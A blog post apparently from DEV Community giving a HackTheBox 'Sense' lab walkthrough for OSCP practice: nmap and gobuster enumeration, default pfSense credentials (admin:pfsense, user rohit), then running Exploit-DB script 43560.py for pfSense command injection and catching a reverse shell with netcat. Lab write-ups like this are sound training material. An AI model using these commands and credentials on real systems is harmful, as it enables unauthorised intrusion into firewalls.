DEV Community 👩‍💻👨‍💻

Cover image for Writeup: HackTheBox Sense - Without Metasploit (OSCP Prep)
Chris 'Huey' S
Chris 'Huey' S

Posted on

Writeup: HackTheBox Sense - Without Metasploit (OSCP Prep)

Hello there!

I just finished doing Sense from Hackthebox and sharing my writeup.

First thing is first, lets start with Nmap!

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.60

  1. -sC = Default Scripts
  2. -sV = Probe open ports to determine service/Versions info
  3. -T4 = Set timing for faster output (0-5)
  4. -oN = Output to save it to a file

Alt Text

Ports Open
80 TCP HTTP lighttp 1.4.35, is an open-source web server optimized for speed-critical environments while remaining standards-compliant secure and flexible.
443 TCP SSL/HTTPs?

Command:

nmap --script vuln -oN vuln.txt 10.10.10.60

Alt Text

After running this command I get a few options for Vulnerabilities. But a MITM and/or Information Disclosure is of little use to us here.

Let's head over to the site.

Alt Text

Now select Accept.

Alt Text

This will bring up a login page.
I tried a few different default options but it didn't allow me to gain access to the site.

Alt Text

Now I am going to try and run Gobuster..

Command:

gobuster dir -u https://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -x txt -k > gobuster

Alt Text

This will take some time, but after some time you should get the following response back from the search.

Alt Text

I am going to check out the .txt files first.

Alt Text

So let's head over to Google to see if we can find any default creds.

After some searching I come across the following.

Alt Text

admin:pfsense

And the username we found above is Rohit.

Afternoon some playing around I noticed that if you switched the case's you will be able to get in.

Alt Text

After we get in we are able to get some additional information on the underlying services.

Version:

2.1.3-Release(amd64) FreeBSD 8-3-Release
root@pf2_1_1_amd64.pfsense.org

Alt Text

With the information that we were able to get from the login window we are able to use this to head over to Google for some more enumerating.

After some searching I come across the following site.

Alt Text

This looks very promising! This is a Command Injection Vulnerability.

When scrolling down into the code base it looks like you only need a few items to get the ball rolling on this one.

Options:

rhost
lhost
lport
username
password

Something I like to do is to check if its already on Kali. Why download something if the exploit is already here?

Command:

searchsploit pfsense

Now look for that tag number 43560.

Alt Text

Command:

locate php/webapps/43560.py
cp /usr/share/exploitdb/exploits/php/webapps/43560.py .

Alt Text

Command:

chmod +x 43560.py

Alt Text

Now let's run this bad boy!

Command:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.7 --lport 1234 --username rohit --password pfsense

Alt Text

Command:

nc -nvlp 1234

Alt Text

Command:

whoami

Alt Text

Now let's get the Flags!

Alt Text

Alt Text

Top comments (0)

🌚 Friends don't let friends browse without dark mode.

Good news! You can update to dark mode in your DEV settings.